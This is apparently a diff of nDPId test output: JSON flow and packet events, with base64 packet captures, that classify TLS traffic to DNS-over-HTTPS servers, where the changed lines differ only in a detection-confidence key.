04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNNWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnMdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0